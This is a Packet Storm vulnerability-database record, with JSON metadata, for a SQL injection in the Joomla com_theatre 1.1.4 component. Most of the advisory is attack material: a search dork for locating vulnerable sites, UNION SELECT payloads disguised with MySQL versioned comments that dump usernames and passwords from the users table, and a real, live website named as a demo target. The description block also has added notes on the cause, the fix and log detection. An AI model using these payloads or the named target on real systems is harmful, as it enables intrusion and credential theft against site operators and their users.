ID PACKETSTORM:137843
Type packetstorm
Reporter xBADGIRL21
Modified 2016-07-10T00:00:00
Description
`######################
# Exploit Title : Joomla com_threate [sic; the request URLs below name the component com_theatre] 1.1.4 SQL injection
# Exploit Author : xBADGIRL21
# Dork : index.php?option=com_threate
# version: 1.1.4
# Vendor Homepage : http://joomlic.com/
# Tested on: [ Windows ]
# skype:xbadgirl21
# Date: 2016/07/09
# video Proof : https://youtu.be/WXqrK7dqGaY
######################
# PoC:
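# The `id` GET parameter of the `show` view is vulnerable to SQL injection.
# The requests below suggest that the value reaches the database query without an
# integer cast or parameter binding (inferred from the PoC; the component source is
# not shown here). The fix is to cast `id` to an integer or bind it as a query
# parameter. In web-server logs these requests stand out by `union`/`select`
# keywords and MySQL versioned comments (`/*!`) inside the `id` value.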
#
# http://server/index.php?option=com_theatre&view=show&id=[SQLi]
#
# Demo
# http://server/index.php?option=com_theatre&view=show&id=36'
#
# http://server/index.php?option=com_theatre&view=show&id=-36
/*!12345union*/ select
1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43
#
# http://server/index.php?option=com_theatre&view=show&id=-36
/*!12345union*/ select
1,2,3,4,5,6,7,8,9,10,/*!12345group_coNcat(username,0x3a,password)*/,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43
from aur_users--
#
# Live Demo :
# https://www.auroratheatre.org/
#
######################
# Discovered by : xBADGIRL21
# Greetz : All Mauritanien Hackers - NoWhere
#######################
`
{"hash": "c00178b3ae9dc9119013a1b2d7ecd5250beb96df5ac803ca51897f3cb0368e3b", "edition": 1, "references": [], "objectVersion": "1.2", "viewCount": 2, "type": "packetstorm", "description": "", "bulletinFamily": "exploit", "href": "https://packetstormsecurity.com/files/137843/Joomla-Threate-1.1.4-SQL-Injection.html", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d4be9c4fc84262b4f39f89565918568f"}, {"key": "description", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "1ee5362a60c6ec03f86d4a9aafba9af6"}, {"key": "modified", "hash": "5d710bd0f383627aaac67e5bdcc7fa5e"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "5d710bd0f383627aaac67e5bdcc7fa5e"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "182369e088a70351af68e956335cbea7"}, {"key": "sourceData", "hash": "a885661052ce458b5bb2015fc6535ad2"}, {"key": "sourceHref", "hash": "2dae0e3a2194b6dfc0bf1bd18062eeb4"}, {"key": "title", "hash": "19947eef68b9ae5d28c4ef8bb3a870e6"}, {"key": "type", "hash": "6466ca3735f647eeaed965d9e71bd35d"}], "published": "2016-07-10T00:00:00", "modified": "2016-07-10T00:00:00", "title": "Joomla Threate 1.1.4 SQL Injection", "cvelist": [], "sourceHref": "https://packetstormsecurity.com/files/download/137843/joomlathreate-sql.txt", "history": [], "reporter": "xBADGIRL21", "lastseen": "2016-11-03T10:26:38", "cvss": {"vector": "NONE", "score": 0.0}, "enchantments": {"score": {"value": 0.4, "vector": "NONE", "modified": "2016-11-03T10:26:38"}, "dependencies": {"references": [], "modified": "2016-11-03T10:26:38"}, "vulnersScore": 0.4}, "sourceData": "`###################### \n# Exploit Title : Joomla com_threate 1.1.4 SQL injection \n# Exploit Author : xBADGIRL21 \n# Dork : index.php?option=com_threate \n# version: 1.1.4 \n# Vendor Homepage : 
http://joomlic.com/ \n# Tested on: [ Windows ] \n# skype:xbadgirl21 \n# Date: 2016/07/09 \n# video Proof : https://youtu.be/WXqrK7dqGaY \n###################### \n# PoC: \n# [id=] Get Parameter Vulnerable To SQL \n# \n# http://server/index.php?option=com_theatre&view=show&id=[SQLi] \n# \n# Demo \n# http://server/index.php?option=com_theatre&view=show&id=36' \n# \n# http://server/index.php?option=com_theatre&view=show&id=-36 \n/*!12345union*/ select \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43 \n# \n# http://server/index.php?option=com_theatre&view=show&id=-36 \n/*!12345union*/ select \n1,2,3,4,5,6,7,8,9,10,/*!12345group_coNcat(username,0x3a,password)*/,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43 \nfrom aur_users-- \n# \n# Live Demo : \n# https://www.auroratheatre.org/ \n# \n###################### \n# Discovered by : xBADGIRL21 \n# Greetz : All Mauritanien Hackers - NoWhere \n####################### \n`\n", "id": "PACKETSTORM:137843"}
{}